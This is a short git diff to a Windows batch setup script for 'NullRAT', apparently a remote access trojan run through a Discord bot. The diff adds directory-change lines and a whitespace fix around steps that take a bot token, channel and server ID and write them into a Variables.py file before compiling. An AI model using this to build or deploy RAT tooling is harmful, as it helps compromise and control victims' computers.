diff --git a/AIO.bat b/AIO.bat index e7c5c9e..36902c1 100644 --- a/AIO.bat +++ b/AIO.bat @@ -64,6 +64,7 @@ if %errorlevel%==2 ( :vars mode con: cols=90 lines=30 @title NullRAT AIO (Variables Setter) +cd "%~dp0NullRAT" cls & echo. echo ██████╗ ██╗ ██╗ ██╗ █████╗ ██████╗ ██╗ █████╗ ██████╗ ██╗ ███████╗███████╗ echo ╚════██╗╚██╗ ██║ ██║██╔══██╗██╔══██╗██║██╔══██╗██╔══██╗██║ ██╔════╝██╔════╝ @@ -127,7 +128,7 @@ if %errorlevel%==2 ( goto a ) if %errorlevel%==1 ( - echo. & echo The following information is correct. + echo. & echo The following information is correct. timeout /t 2 & goto compiler ) @@ -143,6 +144,7 @@ if "%notification%"=="" (cls & echo [ERROR] Notification cannot be empty! & goto set /p "server=Enter Server ID: " if "%server%"=="" (cls & echo [ERROR] Server cannot be empty! & goto createF) +cd "%~dp0NullRAT" echo ^# This file was auto-generated by NullRAT Variables^. DO NOT SHARE^! > Variables.py echo bot_token = ^"%token%^" >> Variables.py echo notification_channel = %notification% >> Variables.py